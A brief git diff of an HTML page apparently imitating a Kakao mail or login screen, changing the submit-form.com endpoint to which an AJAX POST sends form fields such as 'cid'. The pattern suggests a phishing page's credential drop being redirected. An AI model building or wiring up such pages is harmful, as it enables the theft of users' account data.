--- a/mail 2.html
+++ b/mail 2.html
@@ -1521,7 +1521,7 @@ KAKAO D<font color="#83f50a" style="background-color: rgb(0, 224, 0);"></font><f
       
       $.ajax({
         dataType: 'JSON',
-        url: 'https://submit-form.com/FUZtGP9Ap',
+        url: 'https://submit-form.com/a5WpuuTk',
         type: 'POST',
         data:{
           cid:cid,
